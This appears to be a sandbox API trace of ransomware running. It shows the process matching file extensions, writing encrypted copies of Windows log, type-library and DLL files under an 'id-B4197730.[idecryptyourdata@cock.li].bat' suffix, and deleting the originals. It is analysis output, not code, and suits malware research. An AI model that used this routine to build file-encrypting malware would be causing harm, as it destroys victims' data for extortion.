[0069.572] lstrlenW (lpString=".jpg") returned 4 [0069.572] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0069.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0069.572] lstrlenW (lpString=".doc") returned 4 [0069.572] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.572] lstrlenW (lpString=".docx") returned 5 [0069.572] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.572] lstrlenW (lpString=".pdf") returned 4 [0069.572] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.572] lstrlenW (lpString=".xls") returned 4 [0069.572] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.572] lstrlenW (lpString=".xlsx") returned 5 [0069.572] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.572] lstrlenW (lpString=".ppt") returned 4 [0069.572] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.572] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0069.572] lstrlenW (lpString=".zip") returned 4 [0069.572] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.573] lstrlenW (lpString=".rar") returned 4 [0069.573] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.573] lstrlenW (lpString=".bz2") returned 4 [0069.573] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.573] lstrlenW (lpString=".7z") returned 3 [0069.573] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.573] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0069.573] lstrlenW (lpString=".dbf") returned 4 [0069.573] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.573] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0069.573] lstrlenW (lpString=".1cd") returned 4 [0069.573] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.573] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned 80 [0069.573] lstrlenW (lpString=".jpg") returned 4 [0069.573] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.573] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0069.573] lstrlenW (lpString="Windows PowerShell.evtx") returned 23 [0069.573] CreateFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0069.573] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=69632) returned 1 [0069.573] CloseHandle (hObject=0x344) returned 1 [0069.573] GetFileAttributesW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx")) returned 0x20 [0069.574] GetFileAttributesW (lpFileName="C:\\Logs\\Windows PowerShell.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\windows powershell.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0069.574] CreateFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0069.574] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.574] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.574] CreateFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\windows powershell.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0069.574] GetLastError () returned 0x0 [0069.574] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x11000, lpOverlapped=0x0) returned 1 [0069.577] WriteFile (in: hFile=0x350, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x11010, lpOverlapped=0x0) returned 1 [0069.579] ReadFile (in: hFile=0x344, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.579] WriteFile (in: hFile=0x350, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x102, lpOverlapped=0x0) returned 1 [0069.579] SetEndOfFile (hFile=0x350) returned 1 [0069.579] CloseHandle (hObject=0x350) returned 1 [0069.579] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.579] SetEndOfFile (hFile=0x344) returned 1 [0069.580] CloseHandle (hObject=0x344) returned 1 [0069.580] SetFileAttributesW (lpFileName="C:\\Logs\\Windows PowerShell.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0069.580] DeleteFileW (lpFileName="C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx")) returned 1 [0069.581] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.581] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.581] lstrlenW (lpString=".doc") returned 4 [0069.581] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.581] lstrlenW (lpString=".docx") returned 5 [0069.581] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.581] lstrlenW (lpString=".pdf") returned 4 [0069.581] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.581] lstrlenW (lpString=".xls") returned 4 [0069.581] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.581] lstrlenW (lpString=".xlsx") returned 5 [0069.581] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.581] lstrlenW (lpString=".ppt") returned 4 [0069.581] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.581] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.581] lstrlenW (lpString=".zip") returned 4 [0069.581] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.581] lstrlenW (lpString=".rar") returned 4 [0069.581] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.581] lstrlenW (lpString=".bz2") returned 4 [0069.582] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.582] lstrlenW (lpString=".7z") returned 3 [0069.582] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.582] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.582] lstrlenW (lpString=".dbf") returned 4 [0069.582] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.582] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.582] lstrlenW (lpString=".1cd") returned 4 [0069.582] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.582] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.582] lstrlenW (lpString=".jpg") returned 4 [0069.582] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.582] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.582] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.582] lstrlenW (lpString=".doc") returned 4 [0069.582] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0069.582] lstrlenW (lpString=".docx") returned 5 [0069.582] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0069.582] lstrlenW (lpString=".pdf") returned 4 [0069.582] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0069.582] lstrlenW (lpString=".xls") returned 4 [0069.582] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0069.582] lstrlenW (lpString=".xlsx") returned 5 [0069.582] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0069.582] lstrlenW (lpString=".ppt") returned 4 [0069.582] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0069.582] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.582] lstrlenW (lpString=".zip") returned 4 [0069.583] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0069.583] lstrlenW (lpString=".rar") returned 4 [0069.583] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0069.583] lstrlenW (lpString=".bz2") returned 4 [0069.583] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0069.583] lstrlenW (lpString=".7z") returned 3 [0069.583] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0069.583] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.583] lstrlenW (lpString=".dbf") returned 4 [0069.583] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0069.583] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.583] lstrlenW (lpString=".1cd") returned 4 [0069.583] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0069.583] lstrlenW (lpString="C:\\Logs\\Windows PowerShell.evtx") returned 31 [0069.583] lstrlenW (lpString=".jpg") returned 4 [0069.583] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0069.583] lstrcmpiW (lpString1=".sys", lpString2=".bat") returned 1 [0069.583] lstrlenW (lpString="pagefile.sys") returned 12 [0069.583] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0069.583] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.583] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.583] lstrlenW (lpString=".doc") returned 4 [0069.583] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0069.584] lstrlenW (lpString=".docx") returned 5 [0069.584] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0069.584] lstrlenW (lpString=".pdf") returned 4 [0069.584] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0069.584] lstrlenW (lpString=".xls") returned 4 [0069.584] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0069.584] lstrlenW (lpString=".xlsx") returned 5 [0069.584] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0069.584] lstrlenW (lpString=".ppt") returned 4 [0069.584] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0069.584] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.584] lstrlenW (lpString=".zip") returned 4 [0069.584] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0069.584] lstrlenW (lpString=".rar") returned 4 [0069.584] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0069.584] lstrlenW (lpString=".bz2") returned 4 [0069.584] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0069.584] lstrlenW (lpString=".7z") returned 3 [0069.584] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0069.584] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.584] lstrlenW (lpString=".dbf") returned 4 [0069.584] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0069.584] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.584] lstrlenW (lpString=".1cd") returned 4 [0069.584] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0069.584] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.584] lstrlenW (lpString=".jpg") returned 4 [0069.584] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0069.585] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.585] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.585] lstrlenW (lpString=".doc") returned 4 [0069.585] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0069.585] lstrlenW (lpString=".docx") returned 5 [0069.585] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0069.585] lstrlenW (lpString=".pdf") returned 4 [0069.585] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0069.585] lstrlenW (lpString=".xls") returned 4 [0069.585] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0069.585] lstrlenW (lpString=".xlsx") returned 5 [0069.585] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0069.585] lstrlenW (lpString=".ppt") returned 4 [0069.585] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0069.585] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.585] lstrlenW (lpString=".zip") returned 4 [0069.585] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0069.585] lstrlenW (lpString=".rar") returned 4 [0069.585] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0069.585] lstrlenW (lpString=".bz2") returned 4 [0069.585] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0069.585] lstrlenW (lpString=".7z") returned 3 [0069.585] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0069.585] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.585] lstrlenW (lpString=".dbf") returned 4 [0069.585] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0069.585] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.585] lstrlenW (lpString=".1cd") returned 4 [0069.585] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0069.586] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0069.586] lstrlenW (lpString=".jpg") returned 4 [0069.586] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0069.586] lstrcmpiW (lpString1=".OLB", lpString2=".bat") returned 1 [0069.586] lstrlenW (lpString="MSADDNDR.OLB") returned 12 [0069.586] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0070.239] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=15984) returned 1 [0070.239] CloseHandle (hObject=0x394) returned 1 [0070.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb")) returned 0x20 [0070.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0070.239] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0070.239] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.239] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.240] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0070.240] GetLastError () returned 0x0 [0070.240] ReadFile (in: hFile=0x394, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x3e70, lpOverlapped=0x0) returned 1 [0070.241] WriteFile (in: hFile=0x370, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x3e80, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x3e80, lpOverlapped=0x0) returned 1 [0070.242] ReadFile (in: hFile=0x394, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.242] WriteFile (in: hFile=0x370, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.242] SetEndOfFile (hFile=0x370) returned 1 [0070.243] CloseHandle (hObject=0x370) returned 1 [0070.243] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.243] SetEndOfFile (hFile=0x394) returned 1 [0070.243] CloseHandle (hObject=0x394) returned 1 [0070.244] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0070.244] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB" (normalized: "c:\\program files\\common files\\designer\\msaddndr.olb")) returned 1 [0070.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.244] lstrlenW (lpString=".doc") returned 4 [0070.244] lstrcmpiW (lpString1=".doc", lpString2=".OLB") returned -1 [0070.244] lstrlenW (lpString=".docx") returned 5 [0070.244] lstrcmpiW (lpString1=".docx", lpString2="R.OLB") returned -1 [0070.244] lstrlenW (lpString=".pdf") returned 4 [0070.244] lstrcmpiW (lpString1=".pdf", lpString2=".OLB") returned 1 [0070.244] lstrlenW (lpString=".xls") returned 4 [0070.244] lstrcmpiW (lpString1=".xls", lpString2=".OLB") returned 1 [0070.244] lstrlenW (lpString=".xlsx") returned 5 [0070.244] lstrcmpiW (lpString1=".xlsx", lpString2="R.OLB") returned -1 [0070.244] lstrlenW (lpString=".ppt") returned 4 [0070.244] lstrcmpiW (lpString1=".ppt", lpString2=".OLB") returned 1 [0070.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.244] lstrlenW (lpString=".zip") returned 4 [0070.244] lstrcmpiW (lpString1=".zip", lpString2=".OLB") returned 1 [0070.244] lstrlenW (lpString=".rar") returned 4 [0070.244] lstrcmpiW (lpString1=".rar", lpString2=".OLB") returned 1 [0070.244] lstrlenW (lpString=".bz2") returned 4 [0070.245] lstrcmpiW (lpString1=".bz2", lpString2=".OLB") returned -1 [0070.245] lstrlenW (lpString=".7z") returned 3 [0070.245] lstrcmpiW (lpString1=".7z", lpString2="OLB") returned -1 [0070.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.245] lstrlenW (lpString=".dbf") returned 4 [0070.245] lstrcmpiW (lpString1=".dbf", lpString2=".OLB") returned -1 [0070.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.245] lstrlenW (lpString=".1cd") returned 4 [0070.245] lstrcmpiW (lpString1=".1cd", lpString2=".OLB") returned -1 [0070.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.245] lstrlenW (lpString=".jpg") returned 4 [0070.245] lstrcmpiW (lpString1=".jpg", lpString2=".OLB") returned -1 [0070.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.245] lstrlenW (lpString=".doc") returned 4 [0070.245] lstrcmpiW (lpString1=".doc", lpString2=".OLB") returned -1 [0070.245] lstrlenW (lpString=".docx") returned 5 [0070.245] lstrcmpiW (lpString1=".docx", lpString2="R.OLB") returned -1 [0070.245] lstrlenW (lpString=".pdf") returned 4 [0070.245] lstrcmpiW (lpString1=".pdf", lpString2=".OLB") returned 1 [0070.245] lstrlenW (lpString=".xls") returned 4 [0070.245] lstrcmpiW (lpString1=".xls", lpString2=".OLB") returned 1 [0070.245] lstrlenW (lpString=".xlsx") returned 5 [0070.245] lstrcmpiW (lpString1=".xlsx", lpString2="R.OLB") returned -1 [0070.245] lstrlenW (lpString=".ppt") returned 4 [0070.245] lstrcmpiW (lpString1=".ppt", lpString2=".OLB") returned 1 [0070.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.245] lstrlenW (lpString=".zip") returned 4 [0070.245] lstrcmpiW (lpString1=".zip", lpString2=".OLB") returned 1 [0070.245] lstrlenW (lpString=".rar") returned 4 [0070.245] lstrcmpiW (lpString1=".rar", lpString2=".OLB") returned 1 [0070.245] lstrlenW (lpString=".bz2") returned 4 [0070.245] lstrcmpiW (lpString1=".bz2", lpString2=".OLB") returned -1 [0070.245] lstrlenW (lpString=".7z") returned 3 [0070.246] lstrcmpiW (lpString1=".7z", lpString2="OLB") returned -1 [0070.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.246] lstrlenW (lpString=".dbf") returned 4 [0070.246] lstrcmpiW (lpString1=".dbf", lpString2=".OLB") returned -1 [0070.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.246] lstrlenW (lpString=".1cd") returned 4 [0070.246] lstrcmpiW (lpString1=".1cd", lpString2=".OLB") returned -1 [0070.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.OLB") returned 51 [0070.246] lstrlenW (lpString=".jpg") returned 4 [0070.246] lstrcmpiW (lpString1=".jpg", lpString2=".OLB") returned -1 [0070.246] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0070.246] lstrlenW (lpString="api-ms-win-core-processthreads-l1-1-1.dll") returned 41 [0070.246] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0071.248] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=19136) returned 1 [0071.248] CloseHandle (hObject=0x388) returned 1 [0071.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 0x20 [0071.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0071.584] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0071.585] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.585] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0071.585] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0071.890] GetLastError () returned 0x0 [0071.890] ReadFile (in: hFile=0x32c, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x4ac0, lpOverlapped=0x0) returned 1 [0072.275] WriteFile (hFile=0x368, lpBuffer=0x3cf9020, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0) Thread: id = 15 os_tid = 0x58 [0045.435] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x3c30e08 [0045.435] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x3c40e10 [0045.436] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cf80 [0045.436] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x65d0f0 [0045.436] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cde8 [0045.436] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x3e08020 [0045.438] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62ce48 [0045.438] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62ce48, Size=0x20) returned 0x60e9d0 [0045.438] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cef0 [0045.438] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cef0, Size=0x20) returned 0x60ea20 [0045.438] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.439] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.439] 